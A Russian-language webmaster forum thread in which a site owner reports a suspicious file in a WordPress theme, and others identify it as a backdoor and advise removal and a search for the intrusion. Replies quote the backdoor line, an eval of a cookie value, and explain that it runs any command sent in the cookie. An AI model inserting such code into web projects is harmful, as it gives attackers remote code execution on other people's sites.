- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, уважаемы. Делал бекапы, да и проверял что творится на хостингах и тут заметил что антивирус ругается на одном сайте на WP на такой файлик который находится в шаблоне archive.php
Вот содержимое файлика:
Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже... Или удаление потянет за собой некорректную работу шаблона?:popcorn:
Maxim-KL,
Ругается он скорее всего на @eval($_COOKIE['wp_cookie']);
Удалить именно это безусловно надо и к проблемам с 99% вероятностью это не приведет.
Но если не найдете причину появления этого, то завтра оно снова появится.
Поэтому а) удаляйте б) ищите как оно туда попало
Перед первым пунктом, если это дозволительно, добавьте в запрещенные функции eval и остальные из этой подгруппы (исполнение произвольного кода).
Делал бекапы, да и проверял что творится на хостингах
А в предыдущих версиях бэкапов такое же?. .
файлик который находится в шаблоне archive.php
Достаточно наглядный пример.. и про бесплатные шаблоны из неизвестных источников, и про дырявость wp.. Счас ещё SeVlad придёт, подкинет.. ))
а) удаляйте б) ищите как оно туда попало
Удалил, весь файл кажется все пока работает корректно.
Попало наверно еще давно с шалоном, но интересно это все или там еще стоит ожидать кучу неприятностей по файлом...
---------- Добавлено 29.04.2020 в 19:44 ----------
А в предыдущих версиях бэкапов такое же?. .
Да, как бы и нет старых бекапов, и шаблон конечно еще тот... уже и не помню откуда он на том сайте...
Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже... Или удаление потянет за собой некорректную работу шаблона?🍿
Это дырища величиной в сайт. Во-первых, надо посмотреть исходники темы на предмет этого кода. Если там то же самое – значит, это закладка создателя темы, и таких закладок может быть много. Тему фтопку. Если в исходниках этого нет, то сайт взломан. Надо искать подобные шеллы по всему сайту, а также искать исходную дыру, через которую произошёл взлом.
Ни в коем случае не восстанавливать сайт из бэкапов без предварительного анализа сайта специалистом. По возможности закрыть сайт на "Технические работы".
Sitealert, Как раз пишу вам ТЗ по данному сайту)) Надо будет это добавить в него, справитесь? Когда можно высылать?))
Я-то справлюсь, только не надо было этот файл трогать. Надо было просто сайт закрыть.
Надо было просто сайт закрыть.
Так могу файл вернуть обратно. А сайт можно и не закрывать, там как бы нет особой ценности...
добавьте в запрещенные функции eval
Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама... 🙄
Это не функция.
Это не функция.
А хто тогда? o_O
https://www.php.net/manual/en/function.eval.php
Прекрасный ход. Записываем в куки любую команду, заходим на страницу и пхп ее выполняет :) Типичный бэкдор.
Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама...
Это не функция.
eval - это функция.